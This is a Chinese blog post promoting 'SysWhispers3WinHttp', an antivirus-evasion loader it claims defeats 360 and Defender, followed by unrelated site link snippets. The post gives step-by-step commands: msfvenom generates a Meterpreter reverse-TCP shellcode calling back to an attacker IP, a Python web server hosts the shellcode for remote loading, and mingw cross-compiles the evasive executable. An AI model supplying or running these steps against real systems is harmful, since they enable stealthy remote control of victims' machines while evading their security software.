首页 > 其他分享 >免杀工具 -- SysWhispers3WinHttp

免杀工具 -- SysWhispers3WinHttp

时间:2023-06-15 18:32:37浏览次数:43  
标签:SysWhispers3WinHttp GCC 免杀 mingw32 -- gcc syscalls 使用

0x01 工具介绍

SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,可免杀360核晶与Defender等杀软。

0x02 安装与使用

1. 使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.110 lport=4444 -f raw -o beacon.bin

2. 使用python3开启Web服务(或使用CobaltStrike之Host File功能)

python3 -m http.server

3. 修改SysWhispers3WinHttp.c第40行IP地址,使用Linux64位GCC进行交叉编译

x86_64-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls64.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -O1

ps. 或修改SysWhispers3WinHttp.c第4行头文件为syscalls.h,修改第40行IP地址,使用Linux32位GCC进行交叉编译

i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp

4、效果展示

免杀工具 -- SysWhispers3WinHttp_IP

免杀工具 -- SysWhispers3WinHttp_Shell_02

免杀工具 -- SysWhispers3WinHttp_python_03

标签:SysWhispers3WinHttp,GCC,免杀,mingw32,--,gcc,syscalls,使用
From: https://blog.51cto.com/u_15288375/6494034

相关文章

  • Microsoft 365 :小议Private Channels 和Shared Channels
    Blog链接:https://blog.51cto.com/13969817大概5,6年前,Microsoft在发布Teams的时候,仅有StandardChannel和PrivateChannel,其中StandardChannel面向所有用户开放的标准频道;而PrivateChannel是一个私有频道,只适用于Teams中特定的用户。现在Microsoft发布的SharedChannels是Teams中......
  • 学习Spring必学的Java基础知识----反射
    引述要学习Spring框架的技术内幕,必须事先掌握一些基本的Java知识,正所谓“登高必自卑,涉远必自迩”。以下几项Java知识和Spring框架息息相关,不可不学(我将通过一个系列分别介绍这些Java基础知识,希望对大家有所帮助。):[1]Java反射知识-->SpringIoC[2]属性编辑器,即PropertyEditor......
  • 小鹿线Web前端怎么样?
    现在web前端开发开发技术在不断地迭代更新,有很多从事前端开发的程序员在技术上会遇到瓶颈,这个时候小伙伴就应该通过不断的学习开发技术知识,来提升自身的开发技术水平,那小伙伴应该怎么来学习呢?1.梳理清楚知识体系框架学习前端开发技术,不管是入门还是进阶,一定都要有知识体系建设......
  • Linux 下分卷压缩,windows 解压
    1.Linux分卷压缩tarczf-/mnt/import2023/|split-b3G-/mnt/hq2023.tar.gz压缩后形成的文件: 2.将这些文件复制到windows,然后运行命令copy/bhq2023.tar.*hq2023.tar.gz 3.完成后,用winrar打开hq2023.tar.gz即可看到完成文件夹目录 ......
  • Dos命令
    打开CMD的方式开始->系统->命令提示符Win键+R输入cmd打开控制台(推荐使用)在任意文件夹下面,按住shift+鼠标右键,在此处打开命令行窗口资源管理器的地址栏前面加上cmd路径管理员方式运行:选择以管理员方式运行常用的Dos命令#盘符切换D:#查看当前目录下的所有文件dir#切......
  • SpringBoot整合Redis
    第一步:导入坐标 第二步:在application.yml中进行相关配置第三步:使用对应的API对操作接口进行操作 操作 key-value格式的 操作 hash格式的  ......
  • idea 配置 javaweb项目
    对于老的web项目,不是springboot,需要的配置一、git clone 项目 二、配置 projectstructure 这几个都要配置,当然有的项目点开默认有的话修改一下就行,没有就 的手动添加 project 这几个都填好填对 没有classes 就创建一个 modules libbraries 把WEB-INF......
  • .Net6基础配置
    NET6App介绍.NET6的CoreApp框架,用来学习.NET6的一些变动和新特性,使用EFCore,等一系列组件的运用.。软件架构分为模型层,服务层,接口层来做测试使用0.如何使用IConfiguration、Environment直接在builder后的主机中使用。builder.Configuration;builder.Environment1.如何使......
  • MySQL5.7 批量写入数据
    目录MySQL5.7批量写入数据MySQL5.7批量写入数据#一、创建存储过程CREATEPROCEDUREp02()BEGIN DECLARE iINT; SETi=0; WHILE i<=2000DO INSERTINTOxxx.xxx(x,x,x,x,x,x) VALUES (CONCAT('字符串',i),1,'6','6',�......
  • Flink1.13.6 部署踩坑记录
    环境  Hadoop集群是Ambari2.7.5的版本   Flink是1.13.6_2.12的版本问题记录  1.缺少jar包报错:ERRORorg.apache.flink.yarn.cli.FlinkYarnSessionCli[]-ErrorwhilerunningtheFlinksession.java.lang.NoClassDefFoundError:com/sun/jerse......